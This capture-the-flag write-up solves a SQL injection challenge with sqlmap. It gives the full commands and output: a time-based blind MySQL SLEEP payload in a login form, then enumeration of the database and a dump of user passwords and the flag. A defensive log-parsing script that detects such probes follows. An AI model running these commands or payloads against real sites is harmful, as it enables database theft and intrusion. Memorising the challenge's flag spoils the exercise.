sqlmap Study Notes, ongoing (1. Easy_SQLi (time-based, form injection))

Solution

The challenge hint points to SQL injection. The challenge page contains only a single form, so sqlmap is used to inject through that form.

The --forms option drives the automated form injection, and the flag is recovered step by step.

### Summary of what each parameter does:

| Parameter | Purpose | Example |
|---|---|---|
| -u | Specify the target URL. | |
| -C | Specify column name(s); separate multiple columns with commas. | |
| -D | Specify the database name. | |
| -T | Specify the table name. | |
| -r | Load the request from a file, preserving request details; injection points are identified automatically. | |
| --columns | Enumerate the columns of the specified table. | |
| --tables | Enumerate the tables of the specified database. | |
| --dump | Dump data. | |
| --dbs | Enumerate all databases. | `sqlmap -u URL --dbs` |
| --level | Test depth (1-5). | `--level 3` (tests Cookie injection) |
| --risk | Risk level (1-3). | `--risk 3` (uses dangerous statements) |
| --proxy | Use a proxy. | `--proxy="http://127.0.0.1:8080"` |
| --tamper | Bypass a WAF. | `--tamper=space2comment` |
| --forms | Handle forms automatically: discover forms and inject into them. | |
| --batch | No user interaction; default options are chosen automatically. | |
| --current-db | Retrieve the current database name. | |
| --dump-all | Dump all data. | `sqlmap -u URL --dump-all` |
| --os-shell | Obtain a system shell. | `sqlmap -u URL --os-shell` |
```shell
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch --current-db
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf --tables
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users --columns
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users -C id,password,username --dump
```
```
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch --current-db
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.2#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:18:50 /2025-07-01/

[05:18:50] [INFO] testing connection to the target URL
[05:18:50] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:18:51] [INFO] resuming back-end DBMS 'mysql'
[05:18:51] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0518am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:18:51] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:18:51] [INFO] fetching current database
[05:18:51] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:18:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[05:19:10] [INFO] adjusting time delay to 1 second due to good response times
qsnctf
current database: 'qsnctf'
```
```
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf --tables
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.2#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:27:27 /2025-07-01/

[05:27:27] [INFO] testing connection to the target URL
[05:27:27] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:27:28] [INFO] resuming back-end DBMS 'mysql'
[05:27:28] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0527am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:27:28] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.40, Nginx 1.14.2
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:27:28] [INFO] fetching tables for database: 'qsnctf'
[05:27:28] [INFO] fetching number of tables for database 'qsnctf'
[05:27:28] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:27:31] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[05:27:37] [INFO] retrieved:
[05:27:47] [INFO] adjusting time delay to 1 second due to good response times
users
Database: qsnctf
[1 table]
+-------+
| users |
+-------+
```
```
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.2#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:29:34 /2025-07-01/

[05:29:34] [INFO] testing connection to the target URL
[05:29:34] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:29:34] [INFO] resuming back-end DBMS 'mysql'
[05:29:34] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0529am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:29:35] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:29:35] [INFO] fetching columns for table 'users' in database 'qsnctf'
[05:29:35] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:29:38] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:29:53] [INFO] adjusting time delay to 1 second due to good response times
3
[05:29:53] [INFO] retrieved: id
[05:30:01] [INFO] retrieved: int(11)
[05:30:32] [INFO] retrieved: username
[05:31:01] [INFO] retrieved: text
[05:31:20] [INFO] retrieved: password
[05:31:53] [INFO] retrieved: text
Database: qsnctf
Table: users
[3 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| id       | int(11) |
| password | text    |
| username | text    |
+----------+---------+
```
```
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users -C id,password,username --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.2#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:33:55 /2025-07-01/

[05:33:55] [INFO] testing connection to the target URL
[05:33:55] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:33:56] [INFO] resuming back-end DBMS 'mysql'
[05:33:56] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0533am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:33:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:33:56] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'qsnctf'
[05:33:56] [INFO] fetching number of column(s) 'id,password,username' entries for table 'users' in database 'qsnctf'
[05:33:56] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:33:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[05:34:10] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[05:34:18] [INFO] adjusting time delay to 1 second due to good response times
1
[05:34:20] [INFO] retrieved: 123456
[05:34:41] [INFO] retrieved: admin
[05:34:59] [INFO] retrieved: 2
[05:35:03] [INFO] retrieved: flag{ca74d097080346969f41c257318a7411}
[05:37:45] [INFO] retrieved: user
Database: qsnctf
Table: users
[2 entries]
+----+----------------------------------------+----------+
| id | password                               | username |
+----+----------------------------------------+----------+
| 1  | 123456                                 | admin    |
| 2  | flag{ca74d097080346969f41c257318a7411} | user     |
+----+----------------------------------------+----------+
```
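Seen from the defending side, as an added example that is not part of the original write-up: the time-based payload above makes every true/false probe take a whole number of seconds (5 s, then 1 s once sqlmap tunes --time-sec), and that quantised delay is visible in the web server's own access log even though the POST body is not. The script parses constructed nginx log lines (an assumed log_format with `$request_time` appended as the last field) and flags client/path pairs whose response times cluster on whole seconds, with the default sqlmap User-Agent as a secondary signal.

```python
import re
from collections import defaultdict

# Constructed sample: nginx combined log with $request_time appended as the
# last field (assumed log_format; not from the original page). Two clients:
# a normal user and a client whose POSTs to login.php are repeatedly delayed
# by whole seconds, the signature of SLEEP()-based blind injection.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jul/2025:05:18:40 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0" 0.012
198.51.100.7 - - [01/Jul/2025:05:18:42 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0.031
203.0.113.5 - - [01/Jul/2025:05:18:50 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "sqlmap/1.9.2#stable (https://sqlmap.org)" 0.028
203.0.113.5 - - [01/Jul/2025:05:18:51 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "sqlmap/1.9.2#stable (https://sqlmap.org)" 5.004
203.0.113.5 - - [01/Jul/2025:05:18:56 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "sqlmap/1.9.2#stable (https://sqlmap.org)" 5.002
203.0.113.5 - - [01/Jul/2025:05:19:10 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "sqlmap/1.9.2#stable (https://sqlmap.org)" 1.003
203.0.113.5 - - [01/Jul/2025:05:19:11 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "sqlmap/1.9.2#stable (https://sqlmap.org)" 0.030
203.0.113.5 - - [01/Jul/2025:05:19:12 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "sqlmap/1.9.2#stable (https://sqlmap.org)" 1.001
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+ "[^"]*" "(?P<ua>[^"]*)" (?P<rt>\d+\.\d+)$'
)

def parse(log_text):
    """Yield one dict per well-formed line; lines that do not match are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()

def find_time_based_sqli(log_text, min_delay=0.9, jitter=0.1, min_hits=3):
    """Flag (ip, path) pairs with >= min_hits requests whose response time lies
    within `jitter` of a whole second at or above min_delay. Legitimate slow
    pages are not quantised like that; SLEEP(n) probes are. Returns the
    distinct delays (in whole seconds) seen for each flagged pair."""
    hits = defaultdict(list)
    for r in parse(log_text):
        rt = float(r["rt"])
        if rt >= min_delay and abs(rt - round(rt)) <= jitter:
            hits[(r["ip"], r["path"])].append(rt)
    return {key: sorted(set(round(v) for v in vals))
            for key, vals in hits.items() if len(vals) >= min_hits}

def sqlmap_user_agents(log_text):
    """Secondary signal: clients that identify as sqlmap. The default UA is
    trivially changed (--random-agent), so never rely on it alone."""
    return sorted({r["ip"] for r in parse(log_text) if r["ua"].startswith("sqlmap/")})
```

The timing heuristic catches the 5 s probes and the 1 s probes after the delay adjustment, while the unflagged 0.03 s requests from the same client show why a per-request threshold alone would miss half of a time-based run.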
